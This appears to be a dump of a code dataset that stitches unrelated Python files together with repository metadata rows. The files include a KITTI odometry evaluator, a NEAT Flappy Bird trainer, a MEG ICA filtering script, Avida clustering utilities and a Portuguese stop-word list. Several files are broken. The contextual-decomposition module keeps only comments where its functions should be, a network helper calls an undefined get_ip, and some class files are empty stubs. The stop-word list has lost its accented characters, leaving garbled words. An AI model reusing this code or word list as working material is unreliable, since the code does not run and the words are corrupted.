] | 10 | 2020-01-02T09:42:45.000Z | 2021-11-19T11:53:05.000Z | eval_odom.py | nikola3794/kitti-odom-eval | c808874dc18db3b60b8c711e55546f09af553659 | [
"MIT"
] | 22 | 2019-11-18T07:40:18.000Z | 2022-02-20T12:31:29.000Z | # Copyright (C) Huangying Zhan 2019. All rights reserved.
import argparse
from kitti_odometry import KittiEvalOdom
parser = argparse.ArgumentParser(description='KITTI evaluation')
parser.add_argument('--result', type=str, required=True,
help="Result directory")
parser.add_argument('--align', type=str,
choices=['scale', 'scale_7dof', '7dof', '6dof'],
default=None,
help="alignment type")
parser.add_argument('--seqs',
nargs="+",
type=int,
help="sequences to be evaluated",
default=None)
args = parser.parse_args()
eval_tool = KittiEvalOdom()
gt_dir = "dataset/kitti_odom/gt_poses/"
result_dir = args.result
continue_flag = input("Evaluate result in {}? [y/n]".format(result_dir))
if continue_flag == "y":
eval_tool.eval(
gt_dir,
result_dir,
alignment=args.align,
seqs=args.seqs,
)
else:
print("Double check the path!")
| 29.6 | 72 | 0.59556 |
7749a97981a9d33396783bf41834fff772524e60 | 9,115 | py | Python | flappy_bird.py | wandreuscv/IA_learn_flappy_bird | 46491f6336aba04af241b78edfd288f59d4b0aec | [
"MIT"
] | null | null | null | flappy_bird.py | wandreuscv/IA_learn_flappy_bird | 46491f6336aba04af241b78edfd288f59d4b0aec | [
"MIT"
] | null | null | null | flappy_bird.py | wandreuscv/IA_learn_flappy_bird | 46491f6336aba04af241b78edfd288f59d4b0aec | [
"MIT"
] | null | null | null | import pygame
import random
import os
import time
import neat
import visualize
import pickle
import bcolors as b
pygame.font.init()
SCORE_MAX = [0, 0, 0]
WIN_WIDTH = 600
WIN_HEIGHT = 800
FLOOR = 730
STAT_FONT = pygame.font.SysFont("comicsans", 50)
END_FONT = pygame.font.SysFont("comicsans", 70)
DRAW_LINES = False
WIN = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
pygame.display.set_caption("IA LEARNS Flappy Bird")
pipe_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","pipe.png")).convert_alpha())
bg_img = pygame.transform.scale(pygame.image.load(os.path.join("imgs","bg.png")).convert_alpha(), (600, 900))
bird_images = [pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","bird" + str(x) + ".png"))) for x in range(1,4)]
base_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","base.png")).convert_alpha())
gen = 0
def blitRotateCenter(surf, image, topleft, angle):
rotated_image = pygame.transform.rotate(image, angle)
new_rect = rotated_image.get_rect(center = image.get_rect(topleft = topleft).center)
surf.blit(rotated_image, new_rect.topleft)
def draw_window(win, birds, pipes, base, score, gen, pipe_ind):
if gen == 0:
gen = 1
win.blit(bg_img, (0,0))
for pipe in pipes:
pipe.draw(win)
base.draw(win)
for bird in birds:
if DRAW_LINES:
try:
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_TOP.get_width()/2, pipes[pipe_ind].height), 5)
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_BOTTOM.get_width()/2, pipes[pipe_ind].bottom), 5)
except:
pass
bird.draw(win)
score_label = STAT_FONT.render("Pontuao: " + str(score),1,(255,255,255))
win.blit(score_label, (WIN_WIDTH - score_label.get_width() - 15, 10))
score_label = STAT_FONT.render("Gerao: " + str(gen-1),1,(255,255,255))
win.blit(score_label, (10, 10))
score_label = STAT_FONT.render("Restantes: " + str(len(birds)),1,(255,255,255))
win.blit(score_label, (10, 50))
pygame.display.update()
def eval_genomes(genomes, config):
global WIN, gen
win = WIN
gen += 1
nets = []
birds = []
ge = []
for genome_id, genome in genomes:
genome.fitness = 0
net = neat.nn.FeedForwardNetwork.create(genome, config)
nets.append(net)
birds.append(Bird(230,350))
ge.append(genome)
base = Base(FLOOR)
pipes = [Pipe(700)]
score = 0
clock = pygame.time.Clock()
run = True
while run and len(birds) > 0:
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.quit()
quit()
break
pipe_ind = 0
if len(birds) > 0:
if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():
pipe_ind = 1
for x, bird in enumerate(birds):
ge[x].fitness += 0.1
bird.move()
output = nets[birds.index(bird)].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))
if output[0] > 0.5:
bird.jump()
base.move()
rem = []
add_pipe = False
for pipe in pipes:
pipe.move()
for bird in birds:
if pipe.collide(bird, win):
ge[birds.index(bird)].fitness -= 1
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
if pipe.x + pipe.PIPE_TOP.get_width() < 0:
rem.append(pipe)
if not pipe.passed and pipe.x < bird.x:
pipe.passed = True
add_pipe = True
if add_pipe:
score += 1
for genome in ge:
genome.fitness += 5
pipes.append(Pipe(WIN_WIDTH))
for r in rem:
pipes.remove(r)
for bird in birds:
if bird.y + bird.img.get_height() - 10 >= FLOOR or bird.y < -50:
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
draw_window(WIN, birds, pipes, base, score, gen, pipe_ind)
if score > SCORE_MAX[0]:
SCORE_MAX[0] = score
SCORE_MAX[1] = gen - 1
SCORE_MAX[2] = genome.fitness
print(b.HELP, 'ACTUAL SCORE:', score, 'from generation:', gen, 'with fitness:', genome.fitness, b.END)
print(b.OKMSG, 'MAX SCORE FOR NOW:', SCORE_MAX[0], b.END, b.ERRMSG, 'by generation:', SCORE_MAX[1], b.END, b.BLUE, 'with fitness:', SCORE_MAX[2], b.END)
def run(config_file):
config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_file)
p = neat.Population(config)
p.add_reporter(neat.StdOutReporter(True))
stats = neat.StatisticsReporter()
p.add_reporter(stats)
winner = p.run(eval_genomes, 50)
print('\nMelhor Genoma:\n{!s}'.format(winner))
if __name__ == '__main__':
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'config-neat-flappybird.txt')
run(config_path)
| 28.844937 | 207 | 0.576961 |
774a3cbe3570598a07718acd612708e7b85dbeed | 34,273 | py | Python | src/cd.py | laura-rieger/deep-explanation-penalization | ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f | [
"MIT"
] | 105 | 2019-10-01T19:00:35.000Z | 2022-03-25T14:03:32.000Z | src/cd.py | laura-rieger/deep-explanation-penalization | ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f | [
"MIT"
] | 11 | 2020-01-13T15:49:13.000Z | 2021-12-28T11:36:21.000Z | src/cd.py | laura-rieger/deep-explanation-penalization | ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f | [
"MIT"
] | 16 | 2019-12-22T20:53:33.000Z | 2022-03-15T14:17:50.000Z |
#original from https://github.com/csinva/hierarchical-dnn-interpretations/blob/master/acd/scores/cd.py
import torch
import torch.nn.functional as F
from copy import deepcopy
from torch import sigmoid
from torch import tanh
import numpy as np
stabilizing_constant = 10e-20
# propagate tanh nonlinearity
# propagate convolutional or linear layer
# propagate ReLu nonlinearity
# propagate maxpooling operation
# propagate dropout operation
# get contextual decomposition scores for blob
# batch of [start, stop) with unigrams working
# def cd_penalty_annotated(batch, model1, start, stop, scores):
# # get index where annotation present:
# idx_nonzero = (start != -1).nonzero()[:,0]
# model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0]
# correct_idx = (batch.label[ idx_nonzero], torch.arange(batch.label[ idx_nonzero].shape[0]) )
# model_softmax = torch.nn.functional.softmax(model_output, dim =0)[correct_idx]
# output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() -(torch.log(model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #next thing to try
# print(output, torch.log(model_softmax).mean())
# return output
# def cd_penalty_annotated(batch, model1, start, stop, agrees):
# model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
# correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
# model1_softmax = softmax_out((model1_output[0][0],model1_output[0][1]))[correct_idx]
# output = -(torch.log(model1_softmax) * agrees.float()).mean() #+ (torch.log(model1_softmax) * (1-agrees).float()).mean()
# return output
# this implementation of cd is very long so that we can view CD at intermediate layers
# in reality, this should be a loop which uses the above functions
| 49.599132 | 190 | 0.664663 |
774b06809a445d82f24ad6693ec8a85d76b2e232 | 2,554 | py | Python | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 12 | 2019-03-20T20:43:47.000Z | 2020-04-13T11:10:52.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 13 | 2018-06-05T11:54:40.000Z | 2019-07-02T11:33:14.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 2 | 2020-02-15T18:33:35.000Z | 2022-02-13T14:11:41.000Z | # coding: utf8
from __future__ import unicode_literals
STOP_WORDS = set(
"""
s rea acerca ademais adeus agora ainda algo algumas alguns ali alm ambas ambos antes
ao aos apenas apoia apoio apontar aps aquela aquelas aquele aqueles aqui aquilo
as assim atravs atrs at a
baixo bastante bem boa bom breve
cada caminho catorze cedo cento certamente certeza cima cinco coisa com como
comprida comprido conhecida conhecido conselho contra contudo corrente cuja
cujo custa c
da daquela daquele dar das de debaixo demais dentro depois des desde dessa desse
desta deste deve devem dever dez dezanove dezasseis dezassete dezoito diante
direita disso diz dizem dizer do dois dos doze duas d do
s ela elas ele eles em embora enquanto entre ento era essa essas esse esses esta
estado estar estar estas estava este estes esteve estive estivemos estiveram
estiveste estivestes estou est ests esto eu eventual exemplo
falta far favor faz fazeis fazem fazemos fazer fazes fazia fao fez fim final
foi fomos for fora foram forma foste fostes fui
geral grande grandes grupo
inclusive iniciar inicio ir ir isso isto
j
lado lhe ligado local logo longe lugar l
maior maioria maiorias mais mal mas me meio menor menos meses mesmo meu meus mil
minha minhas momento muito muitos mximo ms
na nada naquela naquele nas nem nenhuma nessa nesse nesta neste no nos nossa
nossas nosso nossos nova novas nove novo novos num numa nunca nuns no nvel ns
nmero nmeros
obrigada obrigado oitava oitavo oito onde ontem onze ora os ou outra outras outros
para parece parte partir pegar pela pelas pelo pelos perto pode podem poder poder
podia pois ponto pontos por porquanto porque porqu portanto porm posio
possivelmente posso possvel pouca pouco povo primeira primeiro prprio prxima
prximo puderam pde pe pem
quais qual qualquer quando quanto quarta quarto quatro que quem quer querem quero
questo quieta quieto quinta quinto quinze qu
relao
sabe saber se segunda segundo sei seis sem sempre ser seria sete seu seus sexta
sexto sim sistema sob sobre sois somente somos sou sua suas so stima stimo s
tais tal talvez tambm tanta tanto tarde te tem temos tempo tendes tenho tens
tentar tentaram tente tentei ter terceira terceiro teu teus teve tipo tive
tivemos tiveram tiveste tivestes toda todas todo todos treze trs tu tua tuas
tudo to tm
um uma umas uns usa usar ltimo
vai vais valor veja vem vens ver vez vezes vinda vindo vinte voc vocs vos vossa
vossas vosso vossos vrios vo vm vs
zero
""".split()
)
| 35.971831 | 89 | 0.817541 |
774b9166abe0ad0a7b9b9dd1b88e0f21b94c408a | 13,906 | py | Python | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 10 | 2015-06-13T17:27:18.000Z | 2021-02-14T13:03:11.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 2 | 2020-07-11T18:34:57.000Z | 2021-03-07T02:27:46.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 1 | 2016-03-23T22:26:23.000Z | 2016-03-23T22:26:23.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'miaschiev.ui'
#
# Created: Wed Aug 06 17:13:17 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
| 64.082949 | 151 | 0.718898 |
774bad54e921796a93026ea0248ace9747a3f917 | 1,673 | py | Python | layers/db/db/tests/test_db.py | NASA-IMPACT/hls-sentinel2-downloader-serverless | e3e4f542fc805c6259f20a6dd932c98cccd4144c | [
"Apache-2.0"
] | null | null | null | layers/db/db/tests/test_db.py | NASA-IMPACT/hls-sentinel2-downloader-serverless | e3e4f542fc805c6259f20a6dd932c98cccd4144c | [
"Apache-2.0"
] | 2 | 2021-07-23T00:49:42.000Z | 2021-07-23T00:51:25.000Z | layers/db/db/tests/test_db.py | NASA-IMPACT/hls-sentinel2-downloader-serverless | e3e4f542fc805c6259f20a6dd932c98cccd4144c | [
"Apache-2.0"
] | null | null | null | import os
import pytest
from assertpy import assert_that
from ..models.granule import Granule
from ..models.granule_count import GranuleCount
from ..models.status import Status
from ..session import _get_url, get_session, get_session_maker
| 35.595745 | 71 | 0.780036 |
774d4b0cb7fee10f0f0fa488de8d167fefa2fbd2 | 1,478 | py | Python | dexp/processing/utils/_test/test_normalise.py | haesleinhuepf/dexp | 2ea84f3db323724588fac565fae56f0d522bc5ca | [
"BSD-3-Clause"
] | 16 | 2021-04-21T14:09:19.000Z | 2022-03-22T02:30:59.000Z | dexp/processing/utils/_test/test_normalise.py | haesleinhuepf/dexp | 2ea84f3db323724588fac565fae56f0d522bc5ca | [
"BSD-3-Clause"
] | 28 | 2021-04-15T17:43:08.000Z | 2022-03-29T16:08:35.000Z | dexp/processing/utils/_test/test_normalise.py | haesleinhuepf/dexp | 2ea84f3db323724588fac565fae56f0d522bc5ca | [
"BSD-3-Clause"
] | 3 | 2022-02-08T17:41:30.000Z | 2022-03-18T15:32:27.000Z | import numpy as np
import pytest
from arbol import aprint
from dexp.processing.utils.normalise import Normalise
from dexp.utils.backends import Backend
from dexp.utils.testing.testing import execute_both_backends
| 34.372093 | 106 | 0.725981 |
774ee32b7bd61777145b97c33929e59c467687c5 | 64 | py | Python | pyCameras/__init__.py | imr-luh/pyCameras | 30fc220022b0562f5244d9fd5f436b8630abe4cd | [
"MIT"
] | 2 | 2019-05-10T08:43:38.000Z | 2019-05-17T16:00:13.000Z | pyCameras/__init__.py | imr-luh/pyCameras | 30fc220022b0562f5244d9fd5f436b8630abe4cd | [
"MIT"
] | null | null | null | pyCameras/__init__.py | imr-luh/pyCameras | 30fc220022b0562f5244d9fd5f436b8630abe4cd | [
"MIT"
] | 2 | 2020-03-10T17:15:08.000Z | 2020-04-24T09:02:21.000Z | __version__ = '0.0.1'
from . import utils
from .utils import *
| 12.8 | 21 | 0.6875 |
774f04287f666d1e053a72b91ac8437dc815a95d | 427 | py | Python | sdfspu/sdf_net.py | soundmaking/sdfspu | 164af2602d07b18c45a8182cd5e9638628c7e165 | [
"MIT"
] | null | null | null | sdfspu/sdf_net.py | soundmaking/sdfspu | 164af2602d07b18c45a8182cd5e9638628c7e165 | [
"MIT"
] | null | null | null | sdfspu/sdf_net.py | soundmaking/sdfspu | 164af2602d07b18c45a8182cd5e9638628c7e165 | [
"MIT"
] | null | null | null | import socket
if __name__ == "__main__":
print('IP via get_ip():\t', get_ip())
| 21.35 | 56 | 0.58548 |
775087ff0c58dbd29b82c1af2c4f5dcf0ce17d5d | 844 | py | Python | pysparkling/sql/expressions/literals.py | ptallada/pysparkling | f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78 | [
"Apache-2.0"
] | 260 | 2015-05-11T18:08:44.000Z | 2022-01-15T13:19:43.000Z | pysparkling/sql/expressions/literals.py | ptallada/pysparkling | f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78 | [
"Apache-2.0"
] | 79 | 2015-06-02T09:53:25.000Z | 2021-09-26T11:18:18.000Z | pysparkling/sql/expressions/literals.py | ptallada/pysparkling | f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78 | [
"Apache-2.0"
] | 50 | 2015-06-06T17:00:58.000Z | 2022-01-15T13:19:18.000Z | from ..utils import AnalysisException
from .expressions import Expression
__all__ = ["Literal"]
| 25.575758 | 84 | 0.582938 |
7750af67ab2df68b6c19d4aa9f6c7f583c889749 | 3,812 | py | Python | filter_ICA.py | MadsJensen/RP_scripts | b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf | [
"BSD-3-Clause"
] | null | null | null | filter_ICA.py | MadsJensen/RP_scripts | b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf | [
"BSD-3-Clause"
] | null | null | null | filter_ICA.py | MadsJensen/RP_scripts | b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 8 14:45:02 2014.
@author: mje
"""
import mne
import sys
from mne.io import Raw
from mne.preprocessing import ICA, create_eog_epochs, create_ecg_epochs
import matplotlib
matplotlib.use('Agg')
from my_settings import *
subject = sys.argv[1]
# SETTINGS
n_jobs = 1
l_freq, h_freq = 1, 95 # High and low frequency setting for the band pass
n_freq = 50 # notch filter frequency
decim = 4 # decim value
for condition in conditions:
raw = Raw(mf_autobad_off_folder + "%s_%s_mc_tsss-raw.fif" %
(subject, condition),
preload=True)
raw.drop_channels(raw.info["bads"])
raw.notch_filter(n_freq, n_jobs=n_jobs)
raw.filter(l_freq, None, n_jobs=n_jobs)
raw.save(
mf_autobad_off_folder + "%s_%s_filtered_mc_tsss-raw.fif" %
(subject, condition),
overwrite=True)
# ICA Part
ica = ICA(n_components=0.99, method='fastica', max_iter=512)
picks = mne.pick_types(
raw.info,
meg=True,
eeg=False,
eog=False,
emg=False,
stim=False,
exclude='bads')
ica.fit(raw, picks=picks, decim=decim, reject=reject_params)
# maximum number of components to reject
n_max_eog = 1
n_max_ecg = 3
##########################################################################
# 2) identify bad components by analyzing latent sources.
# DETECT EOG BY CORRELATION
# HORIZONTAL EOG
title = "ICA: %s for %s"
eog_epochs = create_eog_epochs(raw, ch_name="EOG002") # TODO: check EOG
eog_average = eog_epochs.average()
# channel name
eog_inds, scores = ica.find_bads_eog(raw)
eog_inds = eog_inds[:n_max_eog]
ica.exclude += eog_inds
if eog_inds:
fig = ica.plot_scores(
scores, exclude=eog_inds, title=title % ('eog', subject))
fig.savefig(ica_folder + "plots/%s_%s_eog_scores_2.png" % (subject,
condition))
fig = ica.plot_sources(eog_average, exclude=eog_inds)
fig.savefig(ica_folder + "plots/%s_%s_eog_source_2.png" % (subject,
condition))
fig = ica.plot_components(
eog_inds, title=title % ('eog', subject), colorbar=True)
fig.savefig(ica_folder + "plots/%s_%s_eog_component_2.png" % (
subject, condition))
fig = ica.plot_overlay(eog_average, exclude=eog_inds, show=False)
fig.savefig(ica_folder + "plots/%s_%s_eog_excluded_2.png" % (
subject, condition))
del eog_epochs, eog_average
# ECG
ecg_epochs = create_ecg_epochs(raw, tmin=-.5, tmax=.5)
ecg_inds, scores = ica.find_bads_ecg(ecg_epochs)
ecg_inds = ecg_inds[:n_max_ecg]
ica.exclude.extend(ecg_inds)
if ecg_inds:
fig = ica.plot_components(
ecg_inds, title=title % ('ecg', subject), colorbar=True)
fig.savefig(ica_folder + "plots/%s_%s_ecg_component_2.png" % (
subject, condition))
fig = ica.plot_overlay(raw, exclude=ecg_inds, show=False)
fig.savefig(ica_folder + "plots/%s_%s_ecg_excluded_2.png" % (
subject, condition))
fig = ica.plot_properties(raw, picks=ecg_inds)
fig[0].savefig(ica_folder + "plots/%s_%s_plot_properties_2.png" % (
subject, condition))
##########################################################################
# Apply the solution to Raw, Epochs or Evoked like this:
raw_ica = ica.apply(raw)
ica.save(ica_folder + "%s_%s-ica_2.fif" % (subject, condition)) # save ICA
# componenets
# Save raw with ICA removed
raw_ica.save(
ica_folder + "%s_%s_ica-raw.fif" % (subject, condition),
overwrite=True)
| 32.033613 | 79 | 0.594439 |
77526fa74a8b3626dd46cca703ea3aecf100938a | 428 | py | Python | typish/_types.py | georgeharker/typish | 1c043beb74d89e62b10339a2a964f60ec175adfa | [
"MIT"
] | 16 | 2019-08-03T13:57:17.000Z | 2021-11-08T11:51:52.000Z | typish/_types.py | georgeharker/typish | 1c043beb74d89e62b10339a2a964f60ec175adfa | [
"MIT"
] | 27 | 2019-09-11T13:24:38.000Z | 2022-02-11T07:04:12.000Z | typish/_types.py | georgeharker/typish | 1c043beb74d89e62b10339a2a964f60ec175adfa | [
"MIT"
] | 7 | 2019-11-18T16:50:09.000Z | 2021-11-01T14:34:39.000Z | """
PRIVATE MODULE: do not import (from) it directly.
This module contains types that are not available by default.
"""
import typing
from inspect import Parameter
T = typing.TypeVar('T')
KT = typing.TypeVar('KT')
VT = typing.TypeVar('VT')
Empty = Parameter.empty
Unknown = type('Unknown', (Empty, ), {})
Module = type(typing)
NoneType = type(None)
Ellipsis_ = type(...) # Use EllipsisType instead.
EllipsisType = type(...)
| 22.526316 | 61 | 0.703271 |
7752a70c09c370c66d0c734d9856294edf75f0f4 | 11,172 | py | Python | avidaspatial/transform_data.py | emilydolson/avida-spatial-tools | 7beb0166ccefad5fa722215b030ac2a53d62b59e | [
"MIT"
] | 1 | 2018-06-12T18:31:40.000Z | 2018-06-12T18:31:40.000Z | avidaspatial/transform_data.py | emilydolson/avida-spatial-tools | 7beb0166ccefad5fa722215b030ac2a53d62b59e | [
"MIT"
] | 1 | 2016-02-03T23:37:09.000Z | 2016-02-03T23:37:09.000Z | avidaspatial/transform_data.py | emilydolson/avida-spatial-tools | 7beb0166ccefad5fa722215b030ac2a53d62b59e | [
"MIT"
] | null | null | null | from .utils import *
from scipy.spatial.distance import pdist
import scipy.cluster.hierarchy as hierarchicalcluster
def rank_environment_and_phenotypes(environment, phenotypes, k=15):
"""
Clusters sets of resources/tasks using a weighted hamming distance such
that you can have few enough values to give each group of similar things a
different color. This function is designed for cases when you want to
color both an environment and a set of phenotypes such that the colors
corespond to each other.
Takes an EnvironmentFile object, a 2d array of phenotypes, and, optionally,
a number indicating the maximum number of clusters (default 15).
Returns:
- An EnvironmentFile in which the grid has been replaced with integers
indicating which cluster a cell is a member of. Integers are assigned
such that cells containing more or more complex resources have higher
numbers.
- A 2D grid of numbers representing the clusters each phenotype was
assigned to.
- An integer representing the total number of clusters.
"""
environment = convert_world_to_phenotype(environment)
ranks = get_ranks_for_environment_and_phenotypes(environment, phenotypes)
environment, n = assign_ranks_by_cluster(environment, k, ranks)
phenotypes, n = assign_ranks_by_cluster(phenotypes, k, ranks)
return environment, phenotypes, n
def do_clustering(types, max_clust):
"""
Helper method for clustering that takes a list of all of the things being
clustered (which are assumed to be binary numbers represented as strings),
and an int representing the maximum number of clusters that are allowed.
Returns: A dictionary mapping cluster ids to lists of numbers that are part
of that cluster.
"""
# Fill in leading zeros to make all numbers same length.
ls = [list(t[t.find("b")+1:]) for t in types]
prepend_zeros_to_lists(ls)
dist_matrix = pdist(ls, weighted_hamming)
clusters = hierarchicalcluster.complete(dist_matrix)
clusters = hierarchicalcluster.fcluster(clusters, max_clust,
criterion="maxclust")
# Group members of each cluster together
cluster_dict = dict((c, []) for c in set(clusters))
for i in range(len(types)):
cluster_dict[clusters[i]].append(types[i])
return cluster_dict
def rank_clusters(cluster_dict):
"""
Helper function for clustering that takes a dictionary mapping cluster
ids to lists of the binary strings that are part of that cluster and
returns a dictionary mapping cluster ids to integers representing their
"rank". Ranks provide an ordering for the clusters such that each
cluster has its own rank, and clusters are ordered from simplest to
most complex.
"""
# Figure out the relative rank of each cluster
cluster_ranks = dict.fromkeys(cluster_dict.keys())
for key in cluster_dict:
cluster_ranks[key] = eval(string_avg(cluster_dict[key], binary=True))
i = len(cluster_ranks)
for key in sorted(cluster_ranks, key=cluster_ranks.get):
cluster_ranks[key] = i
i -= 1
return cluster_ranks
def get_ranks_for_environment_and_phenotypes(environment, phenotypes, k=15):
"""
Takes an EnvironmentFile and a 2d array represemtimg phenotypes at each
location. Optionally also takes an integer indicating the maximum number
of clusters allowed to be created (default 15).
Environment is expected to already have been converted to binary numbers
(generally because this is being called by rank_environment_and_phenotypes)
Return a dictionary mapping binary strings representing groups of
resources/tasks that are present/performed in a given cell to integers
indicating the ranked order of the cluster they're part of.
"""
# Create list of all niches and all phenotypes, in phenotype format
niches = flatten_array(environment)
phenotypes = flatten_array(phenotypes)
types = set(phenotypes+niches)
types.discard("-0b1") # We'll handle this specially
types.discard("0b0") # We'll handle this specially
# Do all clustering ahead of time so colors remain consistent.
ranks = generate_ranks(list(types), k)
ranks["-0b1"] = -1 # The empty phenotype/niche should always be rank -1
ranks["0b0"] = 0 # The empty phenotype/niche should always be rank 0
return ranks
def assign_ranks_by_cluster(grid, n, ranks=None):
"""
Takes a 2D array representing phenotypes or resource sets across the world,
and integer rpresenting the maximum number of clusters allowed, and
optionally a dictionary indicating the rank of the cluster of each
phenotype/resource set. If this dictionary is not provided, one will be
generated.
Returns: - A 2d array of numbers indicating the ranks of the clusters
of the resource set/phenotype in each cell
- An integer representing the number of clusters created.
"""
if ranks is None:
ranks = generate_ranks(grid, n)
return assign_ranks_to_grid(grid, ranks), len(ranks)
def generate_ranks(grid, n):
"""
Takes a grid of phenotypes or resource sets representing as strings
representing binary numbers, and an integer indicating the maximum number
of clusters to generated.
Clusters the data in grid into a maximum of n groups, ranks each group by
the complexity and length of its "average" member, and returns a dictionary
mapping binary numbers to integers representing the rank of the cluster
they're part of.
"""
phenotypes = deepcopy(grid)
if type(phenotypes) is list and type(phenotypes[0]) is list:
phenotypes = flatten_array(phenotypes)
# Remove duplicates from types
types = list(frozenset(phenotypes))
if len(types) < n:
ranks = rank_types(types)
else:
ranks = cluster_types(types, n)
return ranks
def assign_ranks_to_grid(grid, ranks):
"""
Takes a 2D array of binary numbers represented as strings and a dictionary
mapping binary strings to integers representing the rank of the cluster
they belong to, and returns a grid in which each binary number has been
replaced with the rank of its cluster.
"""
assignments = deepcopy(grid)
ranks["0b0"] = 0
ranks["-0b1"] = -1
for i in range(len(grid)):
for j in range(len(grid[i])):
if type(grid[i][j]) is list:
for k in range(len(grid[i][j])):
assignments[i][j][k] = ranks[grid[i][j][k]]
else:
assignments[i][j] = ranks[grid[i][j]]
return assignments
def cluster_types(types, max_clust=12):
"""
Generates a dictionary mapping each binary number in types to an integer
from 0 to max_clust. Hierarchical clustering is used to determine which
which binary numbers should map to the same integer.
"""
if len(types) < max_clust:
max_clust = len(types)
# Do actual clustering
cluster_dict = do_clustering(types, max_clust)
cluster_ranks = rank_clusters(cluster_dict)
# Create a dictionary mapping binary numbers to indices
ranks = {}
for key in cluster_dict:
for typ in cluster_dict[key]:
ranks[typ] = cluster_ranks[key]
return ranks
def rank_types(types):
"""
Takes a list of binary numbers and returns a dictionary mapping each
binary number to an integer indicating it's rank within the list.
This is basically the better alternative to cluster_types, that works
in that perfect world where we have few enough types to represent each
as its own color.
"""
include_null = '0b0' in types
sorted_types = deepcopy(types)
for i in range(len(sorted_types)):
sorted_types[i] = int(sorted_types[i], 2)
sorted_types.sort()
ranks = {}
for t in types:
ranks[t] = sorted_types.index(eval(t)) + int(not include_null)
return ranks
def make_count_grid(data):
"""
Takes a 2 or 3d grid of strings representing binary numbers.
Returns a grid of the same dimensions in which each binary number has been
replaced by an integer indicating the number of ones that were in that
number.
"""
data = deepcopy(data)
for i in range(len(data)):
for j in range(len(data[i])):
for k in range(len(data[i][j])):
if type(data[i][j][k]) is list:
for l in range(len(data[i][j][k])):
try:
data[i][j][k] = data[i][j][k][l].count("1")
except:
data[i][j][k] = len(data[i][j][k][l])
else:
try:
data[i][j][k] = data[i][j][k].count("1")
except:
data[i][j][k] = len(data[i][j][k])
return data
def make_optimal_phenotype_grid(environment, phenotypes):
"""
Takes an EnvironmentFile object and a 2d array of phenotypes and returns
a 2d array in which each location contains an index representing the
distance between the phenotype in that location and the optimal phenotype
for that location.
This is acheived by using the task list in the EnvironmentFile to convert
the phenotypes to sets of tasks, and comparing them to the sets of
resources in the environment. So if the environment file that you created
the EnvironmentFile object from for some reason doesn't contain all of the
tasks, or doesn't contain them in the right order this won't work. If this
is the environment file that you used for the run of Avida that generated
this data, you should be fine.
"""
world_size = environment.size
phenotypes = deepcopy(phenotypes)
for i in range(world_size[1]):
for j in range(world_size[0]):
for k in range(len(phenotypes[i][j])):
phenotype = phenotype_to_res_set(phenotypes[i][j][k],
environment.tasks)
diff = len(environment[i][j].symmetric_difference(phenotype))
phenotypes[i][j][k] = diff
return phenotypes
def task_percentages(data, n_tasks=9):
"""
Takes a 3D array of strings representing binary numbers and calculates
the percentage of organisms in each cell (across multiple files)
that were doing a given task.
Returns an m x n x n_tasks array indicating the percentages of organisms
at each location (across the 3rd dimension) that were doing each task.
"""
pdata = deepcopy(data)
for i in range(len(data)):
for j in range(len(data[0])):
percentages = [0.0]*n_tasks
for k in range(len(data[i][j])):
b_ind = data[i][j][k].find("b")
for l in range(b_ind+1, len(data[i][j][k])):
percentages[l-2] += int(data[i][j][k][l])
for p in range(len(percentages)):
percentages[p] /= len(data[i][j])
pdata[i][j] = percentages
return pdata
| 36.993377 | 79 | 0.669083 |
775334a35368377b6411b76e0cda684325c797b3 | 119 | py | Python | Python/ComplexPaths02/src/main/MainModule01.py | tduoth/JsObjects | eb3e2a8b1f47d0da53c8b1a85a7949269711932f | [
"MIT"
